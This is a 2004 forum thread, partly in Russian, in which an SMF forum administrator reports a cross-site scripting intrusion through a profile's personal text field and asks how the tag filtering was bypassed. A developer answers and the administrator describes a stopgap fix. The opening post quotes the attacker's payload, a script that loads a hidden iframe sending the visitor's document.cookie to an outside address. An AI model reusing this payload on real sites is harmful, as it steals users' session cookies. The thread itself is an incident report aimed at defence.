personalText: XSS

Started by Toomany, December 10, 2004, 02:20:27 AM

Previous topic - Next topic

Toomany

Буквально этой ночью на моём форуме (RC2) один безвестный нехорошийчеловек каким-то образом умудрился внедрить в personalText своего профиля вредоносный javascript.
Выглядела его подпись при просмотре HTML примерно так:
<script src=адрес скриптa></script>
Скрипт в свою очередь выглядел так:
var a='<iframe src=http://адрес/?co=' + document.cookie + ' width=0 height=0 style=visibility:hidden></iframe>';document.write(a);

Причем! По идее, при обработке полей профиля < и > должны меняться на соответствующие литералы &lt; и &gt;. Более того, менялись - если я заходил в этого человека и пересохранял его - теги убивались, меняясь на литералы.

Внимание, вопрос знатокам! :)
КАК этот нехороший человек ухитрился засадить в personalText этот самый жаба-скрипт? :)
Too many shadows, whispering voices,
Faces on posters, too many choices:
If, when, why, what?
How much have you got?
Have you got it, do you get it, if so, how often?
And which do you choose, a hard or soft option?..
How much do you need?..

[Unknown]

#1
I can't read Russian, but you can't put any javascript into your personal text, unless you've changed something.

Try putting <b>test</b> in there.  If you're right, your personal text will be bold.

Now, of course, if you have database access you can manually edit the field, and get the effect I assume you describe.  For this reason, we suggest you do not give your users phpMyAdmin or MySQL server access.

If you're saying that someone did this to you, I will need you to send me Apache access logs from the time it happened, if possible.

-[Unknown]

Toomany

#2
U can't read Russian, I can't write in English... That's cruel fate =(

Briefly:
Someone has successfully embedded malicious javascript into his personal text at my SMF 1.0RC2.
And hell if I know, how it has bypassed a "</>" filtration - I could not reproduce it.

Now personal t0ext strip_tags()'ed :) before output - for a while.
Too many shadows, whispering voices,
Faces on posters, too many choices:
If, when, why, what?
How much have you got?
Have you got it, do you get it, if so, how often?
And which do you choose, a hard or soft option?..
How much do you need?..

Advertisement: